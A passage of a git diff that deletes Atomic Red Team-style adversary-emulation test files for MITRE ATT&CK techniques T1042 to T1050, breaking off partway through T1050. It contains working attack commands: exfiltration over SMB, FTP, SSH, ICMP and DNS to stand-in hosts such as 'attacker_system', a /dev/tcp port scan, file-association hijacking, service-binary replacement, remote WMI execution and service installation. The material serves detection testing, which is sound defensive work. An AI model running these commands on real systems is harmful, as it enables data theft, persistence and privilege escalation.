-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| interface | Specify interface to perform PCAP on. | String | Ethernet0|
-
-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
-
-```powershell
-& "c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5
-& c:\windump.exe
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1042.md b/Atomic_Threat_Coverage/Triggers/T1042.md
deleted file mode 100644
index 2856a41..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1042.md
+++ /dev/null
@@ -1,52 +0,0 @@
-# T1042 - Change Default File Association
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1042)
-<blockquote>When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access (Citation: Microsoft Change Default Programs) (Citation: Microsoft File Handlers) or by administrators using the built-in assoc utility. (Citation: Microsoft Assoc Oct 2017) Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.
-
-System file associations are listed under <code>HKEY_CLASSES_ROOT\.[extension]</code>, for example <code>HKEY_CLASSES_ROOT\.txt</code>. The entries point to a handler for that extension located at <code>HKEY_CLASSES_ROOT\[handler]</code>. The various commands are then listed as subkeys underneath the shell key at <code>HKEY_CLASSES_ROOT\[handler]\shell\[action]\command</code>. For example:
-* <code>HKEY_CLASSES_ROOT\txtfile\shell\open\command</code>
-* <code>HKEY_CLASSES_ROOT\txtfile\shell\print\command</code>
-* <code>HKEY_CLASSES_ROOT\txtfile\shell\printto\command</code>
-
-The values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can modify these values to continually execute arbitrary commands. (Citation: TrendMicro TROJ-FAKEAV OCT 2012)</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Change Default File Association](#atomic-test-1---change-default-file-association)
-
-
-<br/>
-
-## Atomic Test #1 - Change Default File Association
-Change Default File Association From cmd.exe of hta to notepad.
-
-Upon successful execution, cmd.exe will change the file association of .hta to notepad.exe. 
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| extension_to_change | File Extension To Hijack | String | .hta|
-| target_extension_handler | txtfile maps to notepad.exe | Path | txtfile|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-assoc #{extension_to_change}=#{target_extension_handler}
-```
-
-#### Cleanup Commands:
-```cmd
-assoc .hta=htafile
-```
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1044.md b/Atomic_Threat_Coverage/Triggers/T1044.md
deleted file mode 100644
index bfdf996..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1044.md
+++ /dev/null
@@ -1,84 +0,0 @@
-# T1044 - File System Permissions Weakness
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1044)
-<blockquote>Processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
-
-Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.
-
-### Services
-
-Manipulation of Windows service binaries is one variation of this technique. Adversaries may replace a legitimate service executable with their own executable to gain persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService). Once the service is started, either directly by the user (if appropriate access is available) or through some other means, such as a system restart if the service starts on bootup, the replaced executable will run instead of the original service executable.
-
-### Executable Installers
-
-Another variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the <code>%TEMP%</code> directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038). Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Account Control](https://attack.mitre.org/techniques/T1088). Several examples of this weakness in existing common installers have been reported to software vendors. (Citation: Mozilla Firefox Installer DLL Hijack) (Citation: Seclists Kanthak 7zip Installer)</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - File System Permissions Weakness](#atomic-test-1---file-system-permissions-weakness)
-
-
-<br/>
-
-## Atomic Test #1 - File System Permissions Weakness
-This test to show checking file system permissions weakness and which can lead to privilege escalation by replacing malicious file. Example; check weak file permission and then replace.
-powershell -c "Get-WmiObject win32_service | select PathName"   (check service file location) and
-copy /Y C:\temp\payload.exe C:\ProgramData\folder\Update\weakpermissionfile.exe   ( replace weak permission file with malicious file )
-
-Upon execution, open the weak permission file at %temp%\T1044_weak_permission_file.txt and verify that it's contents read "T1044 Malicious file". To verify
-the weak file permissions, open File Explorer to%temp%\T1044_weak_permission_file.exe then open Properties and Security to view the Full Control permission is enabled.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| weak_permission_file | check weak files permission | path | $env:TEMP&#92;T1044_weak_permission_file.txt|
-| malicious_file | File to replace weak permission file with | path | $env:TEMP&#92;T1044&#92;T1044_malicious_file.txt|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-Get-WmiObject win32_service | select PathName
-Copy-Item #{malicious_file} -Destination #{weak_permission_file} -Force
-```
-
-#### Cleanup Commands:
-```powershell
-Remove-Item #{weak_permission_file} -Force -ErrorAction Ignore
-Remove-Item -Recurse (Split-Path #{malicious_file}) -Force -ErrorAction Ignore
-```
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: A file must exist on disk at specified location (#{weak_permission_file})
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{weak_permission_file}) {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-New-Item #{weak_permission_file} -Force | Out-Null
-Set-Content -Path #{weak_permission_file} -Value "T1044 Weak permission file"
-```
-##### Description: A file to replace the original weak_permission_file. In an attack this would be the malicious file gaining extra privileges
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{malicious_file}) {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -Type Directory -Path $env:TEMP\T1044\ -Force | Out-Null
-New-Item #{malicious_file} -Force | Out-Null
-Set-Content -Path #{malicious_file} -Value "T1044 Malicious file"
-```
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1045.md b/Atomic_Threat_Coverage/Triggers/T1045.md
deleted file mode 100644
index 397bd91..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1045.md
+++ /dev/null
@@ -1,159 +0,0 @@
-# T1045 - Software Packing
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1045)
-<blockquote>Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory.
-
-Utilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available, (Citation: Wikipedia Exe Compression) but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.
-
-Adversaries may use virtual machine software protection as a form of software packing to protect their code. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.(Citation: ESET FinFisher Jan 2018)</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Binary simply packed by UPX (linux)](#atomic-test-1---binary-simply-packed-by-upx-linux)
-
-- [Atomic Test #2 - Binary packed by UPX, with modified headers (linux)](#atomic-test-2---binary-packed-by-upx-with-modified-headers-linux)
-
-- [Atomic Test #3 - Binary simply packed by UPX](#atomic-test-3---binary-simply-packed-by-upx)
-
-- [Atomic Test #4 - Binary packed by UPX, with modified headers](#atomic-test-4---binary-packed-by-upx-with-modified-headers)
-
-
-<br/>
-
-## Atomic Test #1 - Binary simply packed by UPX (linux)
-Copies and then runs a simple binary (just outputting "the cake is a lie"), that was packed by UPX.
-No other protection/compression were applied.
-
-**Supported Platforms:** Linux
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| bin_path | Packed binary | Path | PathToAtomicsFolder/T1045/bin/linux/test_upx|
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin
-```
-
-#### Cleanup Commands:
-```sh
-rm /tmp/packed_bin
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Binary packed by UPX, with modified headers (linux)
-Copies and then runs a simple binary (just outputting "the cake is a lie"), that was packed by UPX.
-
-The UPX magic number (`0x55505821`, "`UPX!`") was changed to (`0x4c4f5452`, "`LOTR`"). This prevents the binary from being detected
-by some methods, and especially UPX is not able to uncompress it any more.
-
-**Supported Platforms:** Linux
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| bin_path | Packed binary | Path | PathToAtomicsFolder/T1045/bin/linux/test_upx_header_changed|
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin
-```
-
-#### Cleanup Commands:
-```sh
-rm /tmp/packed_bin
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Binary simply packed by UPX
-Copies and then runs a simple binary (just outputting "the cake is a lie"), that was packed by UPX.
-No other protection/compression were applied.
-
-**Supported Platforms:** macOS
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| bin_path | Packed binary | Path | PathToAtomicsFolder/T1045/bin/darwin/test_upx|
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin
-```
-
-#### Cleanup Commands:
-```sh
-rm /tmp/packed_bin
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - Binary packed by UPX, with modified headers
-Copies and then runs a simple binary (just outputting "the cake is a lie"), that was packed by UPX.
-
-The UPX magic number (`0x55505821`, "`UPX!`") was changed to (`0x4c4f5452`, "`LOTR`"). This prevents the binary from being detected
-by some methods, and especially UPX is not able to uncompress it any more.
-
-**Supported Platforms:** macOS
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| bin_path | Packed binary | Path | PathToAtomicsFolder/T1045/bin/darwin/test_upx_header_changed|
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin
-```
-
-#### Cleanup Commands:
-```sh
-rm /tmp/packed_bin
-```
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1046.md b/Atomic_Threat_Coverage/Triggers/T1046.md
deleted file mode 100644
index fb27e17..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1046.md
+++ /dev/null
@@ -1,89 +0,0 @@
-# T1046 - Network Service Scanning
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1046)
-<blockquote>Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation. Methods to acquire this information include port scans and vulnerability scans using tools that are brought onto a system. 
-
-Within cloud environments, adversaries may attempt to discover services running on other cloud hosts or cloud services enabled within the environment. Additionally, if the cloud environment is connected to a on-premises environment, adversaries may be able to identify services running on non-cloud systems.</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Port Scan](#atomic-test-1---port-scan)
-
-- [Atomic Test #2 - Port Scan Nmap](#atomic-test-2---port-scan-nmap)
-
-
-<br/>
-
-## Atomic Test #1 - Port Scan
-Scan ports to check for listening ports.
-
-Upon successful execution, sh will perform a network connection against a single host (192.168.1.1) and determine what ports are open in the range of 1-65535. Results will be via stdout.
-
-**Supported Platforms:** Linux, macOS
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-for port in {1..65535};
-do
-  echo >/dev/tcp/192.168.1.1/$port && echo "port $port is open" || echo "port $port is closed" : ;
-done
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Port Scan Nmap
-Scan ports to check for listening ports with Nmap.
-
-Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of adresseses on port 80 to determine if listening. Results will be via stdout.
-
-**Supported Platforms:** Linux, macOS
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| network_range | Network Range to Scan. | string | 192.168.1.0/24|
-| port | Ports to scan. | string | 80|
-| host | Host to scan. | string | 192.168.1.1|
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-nmap -sS #{network_range} -p #{port}
-telnet #{host} #{port}
-nc -nv #{host} #{port}
-```
-
-
-
-
-#### Dependencies:  Run with `sh`!
-##### Description: Check if nmap command exists on the machine
-##### Check Prereq Commands:
-```sh
-if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1; 
-```
-##### Get Prereq Commands:
-```sh
-echo "Install nmap on the machine to run the test."; exit 1;
-```
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1047.md b/Atomic_Threat_Coverage/Triggers/T1047.md
deleted file mode 100644
index b8bc021..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1047.md
+++ /dev/null
@@ -1,200 +0,0 @@
-# T1047 - Windows Management Instrumentation
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1047)
-<blockquote>Windows Management Instrumentation (WMI) is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) (Citation: Wikipedia SMB) and Remote Procedure Call Service (RPCS) (Citation: TechNet RPC) for remote access. RPCS operates over port 135. (Citation: MSDN WMI)
-
-An adversary can use WMI to interact with local and remote systems and use it as a means to perform many tactic functions, such as gathering information for Discovery and remote Execution of files as part of Lateral Movement. (Citation: FireEye WMI 2015)</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - WMI Reconnaissance Users](#atomic-test-1---wmi-reconnaissance-users)
-
-- [Atomic Test #2 - WMI Reconnaissance Processes](#atomic-test-2---wmi-reconnaissance-processes)
-
-- [Atomic Test #3 - WMI Reconnaissance Software](#atomic-test-3---wmi-reconnaissance-software)
-
-- [Atomic Test #4 - WMI Reconnaissance List Remote Services](#atomic-test-4---wmi-reconnaissance-list-remote-services)
-
-- [Atomic Test #5 - WMI Execute Local Process](#atomic-test-5---wmi-execute-local-process)
-
-- [Atomic Test #6 - WMI Execute Remote Process](#atomic-test-6---wmi-execute-remote-process)
-
-
-<br/>
-
-## Atomic Test #1 - WMI Reconnaissance Users
-An adversary might use WMI to list all local User Accounts. 
-When the test completes , there should be local user accounts information displayed on the command line.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-wmic useraccount get /ALL /format:csv
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - WMI Reconnaissance Processes
-An adversary might use WMI to list Processes running on the compromised host.
-When the test completes , there should be running processes listed on the command line.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-wmic process get caption,executablepath,commandline /format:csv
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - WMI Reconnaissance Software
-An adversary might use WMI to list installed Software hotfix and patches.
-When the test completes, there should be a list of installed patches and when they were installed.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-wmic qfe get description,installedOn /format:csv
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - WMI Reconnaissance List Remote Services
-An adversary might use WMI to check if a certain Remote Service is running on a remote device. 
-When the test completes, a service information will be displayed on the screen if it exists.
-A common feedback message is that "No instance(s) Available" if the service queried is not running.
-A common error message is "Node - (provided IP or default)  ERROR Description =The RPC server is unavailable" 
-if the provided remote host is unreacheable
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| node | Ip Address | String | 127.0.0.1|
-| service_search_string | Name Of Service | String | Spooler|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-wmic /node:"#{node}" service where (caption like "%#{service_search_string}%")
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #5 - WMI Execute Local Process
-This test uses wmic.exe to execute a process on the local host.
-When the test completes , a new process will be started locally .A notepad application will be started when input is left on default.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| process_to_execute | Name or path of process to execute. | String | notepad.exe|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-wmic process call create #{process_to_execute}
-```
-
-#### Cleanup Commands:
-```cmd
-wmic process where name='#{process_to_execute}' delete >nul 2>&1
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #6 - WMI Execute Remote Process
-This test uses wmic.exe to execute a process on a remote host. Specify a valid value for remote IP using the node parameter.
-To clean up, provide the same node input as the one provided to run the test
-A common error message is "Node - (provided IP or default)  ERROR Description =The RPC server is unavailable" if the default or provided IP is unreachable 
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| node | Ip Address | String | 127.0.0.1|
-| process_to_execute | Name or path of process to execute. | String | notepad.exe|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-wmic /node:"#{node}" process call create #{process_to_execute}
-```
-
-#### Cleanup Commands:
-```cmd
-wmic /node:"#{node}" process where name='#{process_to_execute}' delete >nul 2>&1
-```
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1048.md b/Atomic_Threat_Coverage/Triggers/T1048.md
deleted file mode 100644
index 016f91f..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1048.md
+++ /dev/null
@@ -1,192 +0,0 @@
-# T1048 - Exfiltration Over Alternative Protocol
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1048)
-<blockquote>Data exfiltration is performed with a different protocol from the main command and control protocol or channel. The data is likely to be sent to an alternate network location from the main command and control server. Alternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Different channels could include Internet Web services such as cloud storage.
-
-Adversaries may leverage various operating system utilities to exfiltrate data over an alternative protocol. 
-
-SMB command-line example:
-
-* <code>net use \\\attacker_system\IPC$ /user:username password && xcopy /S /H /C /Y C:\Users\\* \\\attacker_system\share_folder\</code>
-
-Anonymous FTP command-line example:(Citation: Palo Alto OilRig Oct 2016)
-
-* <code>echo PUT C:\Path\to\file.txt | ftp -A attacker_system</code>
-</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Exfiltration Over Alternative Protocol - SSH](#atomic-test-1---exfiltration-over-alternative-protocol---ssh)
-
-- [Atomic Test #2 - Exfiltration Over Alternative Protocol - SSH](#atomic-test-2---exfiltration-over-alternative-protocol---ssh)
-
-- [Atomic Test #3 - Exfiltration Over Alternative Protocol - HTTP](#atomic-test-3---exfiltration-over-alternative-protocol---http)
-
-- [Atomic Test #4 - Exfiltration Over Alternative Protocol - ICMP](#atomic-test-4---exfiltration-over-alternative-protocol---icmp)
-
-- [Atomic Test #5 - Exfiltration Over Alternative Protocol - DNS](#atomic-test-5---exfiltration-over-alternative-protocol---dns)
-
-
-<br/>
-
-## Atomic Test #1 - Exfiltration Over Alternative Protocol - SSH
-Input a domain and test Exfiltration over SSH
-
-Remote to Local
-
-Upon successful execution, sh will spawn ssh contacting a remote domain (default: target.example.com) writing a tar.gz file.
-
-**Supported Platforms:** macOS, Linux
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| domain | target SSH domain | url | target.example.com|
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Exfiltration Over Alternative Protocol - SSH
-Input a domain and test Exfiltration over SSH
-
-Local to Remote
-
-Upon successful execution, tar will compress /Users/* directory and password protect the file modification of `Users.tar.gz.enc` as output.
-
-**Supported Platforms:** macOS, Linux
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| domain | target SSH domain | url | target.example.com|
-| user_name | username for domain | string | atomic|
-| password | password for user | string | atomic|
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@#{domain} 'cat > /Users.tar.gz.enc'
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Exfiltration Over Alternative Protocol - HTTP
-A firewall rule (iptables or firewalld) will be needed to allow exfiltration on port 1337.
-
-Upon successful execution, sh will be used to make a directory (/tmp/victim-staging-area), write a txt file, and host the directory with Python on port 1337, to be later downloaded.
-
-**Supported Platforms:** macOS, Linux
-
-
-
-
-#### Run it with these steps! 
-1. Victim System Configuration:
-
-    mkdir /tmp/victim-staging-area
-    echo "this file will be exfiltrated" > /tmp/victim-staging-area/victim-file.txt
-
-2. Using Python to establish a one-line HTTP server on victim system:
-
-    cd /tmp/victim-staging-area
-    python -m SimpleHTTPServer 1337
-
-3. To retrieve the data from an adversary system:
-
-    wget http://VICTIM_IP:1337/victim-file.txt
-
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - Exfiltration Over Alternative Protocol - ICMP
-Exfiltration of specified file over ICMP protocol.
-
-Upon successful execution, powershell will utilize ping (icmp) to exfiltrate notepad.exe to a remote address (default 127.0.0.1). Results will be via stdout.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| input_file | Path to file to be exfiltrated. | Path | C:&#92;Windows&#92;System32&#92;notepad.exe|
-| ip_address | Destination IP address where the data should be sent. | String | 127.0.0.1|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-$ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send("#{ip_address}", 1500, $Data) }
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #5 - Exfiltration Over Alternative Protocol - DNS
-Exfiltration of specified file over DNS protocol.
-
-**Supported Platforms:** Linux
-
-
-
-
-#### Run it with these steps! 
-1. On the adversary machine run the below command.
-
-    tshark -f "udp port 53" -Y "dns.qry.type == 1 and dns.flags.response == 0 and dns.qry.name matches ".domain"" >> received_data.txt
-
-2. On the victim machine run the below commands.
-
-    xxd -p input_file > encoded_data.hex | for data in `cat encoded_data.hex`; do dig $data.domain; done
-    
-3. Once the data is received, use the below command to recover the data.
-
-    cat output_file | cut -d "A" -f 2 | cut -d " " -f 2 | cut -d "." -f 1 | sort | uniq | xxd -p -r
-
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1049.md b/Atomic_Threat_Coverage/Triggers/T1049.md
deleted file mode 100644
index e589cd9..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1049.md
+++ /dev/null
@@ -1,116 +0,0 @@
-# T1049 - System Network Connections Discovery
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1049)
-<blockquote>Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. 
-
-An adversary who gains access to a system that is part of a cloud-based environment may map out Virtual Private Clouds or Virtual Networks in order to determine what systems and services are connected. The actions performed are likely the same types of discovery techniques depending on the operating system, but the resulting information may include details about the networked cloud environment relevant to the adversary's goals. Cloud providers may have different ways in which their virtual networks operate.(Citation: Amazon AWS VPC Guide)(Citation: Microsoft Azure Virtual Network Overview)(Citation: Google VPC Overview)
-
-### Windows
-
-Utilities and commands that acquire this information include [netstat](https://attack.mitre.org/software/S0104), "net use," and "net session" with [Net](https://attack.mitre.org/software/S0039).
-
-### Mac and Linux 
-
-In Mac and Linux, <code>netstat</code> and <code>lsof</code> can be used to list current connections. <code>who -a</code> and <code>w</code> can be used to show which users are currently logged in, similar to "net session".</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - System Network Connections Discovery](#atomic-test-1---system-network-connections-discovery)
-
-- [Atomic Test #2 - System Network Connections Discovery with PowerShell](#atomic-test-2---system-network-connections-discovery-with-powershell)
-
-- [Atomic Test #3 - System Network Connections Discovery Linux & MacOS](#atomic-test-3---system-network-connections-discovery-linux--macos)
-
-
-<br/>
-
-## Atomic Test #1 - System Network Connections Discovery
-Get a listing of network connections.
-
-Upon successful execution, cmd.exe will execute `netstat`, `net use` and `net sessions`. Results will output via stdout.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-netstat
-net use
-net sessions
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - System Network Connections Discovery with PowerShell
-Get a listing of network connections.
-
-Upon successful execution, powershell.exe will execute `get-NetTCPConnection`. Results will output via stdout.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-Get-NetTCPConnection
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - System Network Connections Discovery Linux & MacOS
-Get a listing of network connections.
-
-Upon successful execution, sh will execute `netstat` and `who -a`. Results will output via stdout.
-
-**Supported Platforms:** Linux, macOS
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-netstat
-who -a
-```
-
-
-
-
-#### Dependencies:  Run with `sh`!
-##### Description: Check if netstat command exists on the machine
-##### Check Prereq Commands:
-```sh
-if [ -x "$(command -v netstat)" ]; then exit 0; else exit 1; 
-```
-##### Get Prereq Commands:
-```sh
-echo "Install netstat on the machine."; exit 1;
-```
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1050.md b/Atomic_Threat_Coverage/Triggers/T1050.md
deleted file mode 100644
index 5dad716..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1050.md
+++ /dev/null
@@ -1,116 +0,0 @@
-# T1050 - New Service
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1050)
-<blockquote>When operating systems boot up, they can start programs or applications called services that perform background system functions. (Citation: TechNet Services) A service's configuration information, including the file path to the service's executable, is stored in the Windows Registry. 
-
-Adversaries may install a new service that can be configured to execute at startup by using utilities to interact with services or by directly modifying the Registry. The service name may be disguised by using a name from a related operating system or benign software with [Masquerading](https://attack.mitre.org/techniques/T1036). Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges from administrator to SYSTEM. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1035).</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Service Installation CMD](#atomic-test-1---service-installation-cmd)
-
-- [Atomic Test #2 - Service Installation PowerShell](#atomic-test-2---service-installation-powershell)
-
-
-<br/>
-
-## Atomic Test #1 - Service Installation CMD
-Download an executable from github and start it as a service.
-
-Upon successful execution, powershell will download `AtomicService.exe` from github. cmd.exe will spawn sc.exe which will create and start the service. Results will output via stdout.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| binary_path | Name of the service binary, include path. | Path | PathToAtomicsFolder&#92;T1050&#92;bin&#92;AtomicService.exe|
-| service_name | Name of the Service | String | AtomicTestService|
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
-
-```cmd
-sc.exe create #{service_name} binPath= #{binary_path}
-sc.exe start #{service_name}
-```
-
-#### Cleanup Commands:
-```cmd
-sc.exe stop #{service_name} >nul 2>&1
-sc.exe delete #{service_name} >nul 2>&1
-```
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: Service binary must exist on disk at specified location (#{binary_path})
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{binary_path}) {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null
-Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1050/bin/AtomicService.exe" -OutFile "#{binary_path}"
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Service Installation PowerShell
-Installs A Local Service via PowerShell.
-
-Upon successful execution, powershell will download `AtomicService.exe` from github. Powershell will then use `New-Service` and `Start-Service` to start service. Results will be displayed.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| binary_path | Name of the service binary, include path. | Path | PathToAtomicsFolder&#92;T1050&#92;bin&#92;AtomicService.exe|
-| service_name | Name of the Service | String | AtomicTestService|
-
-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
-
-```powershell
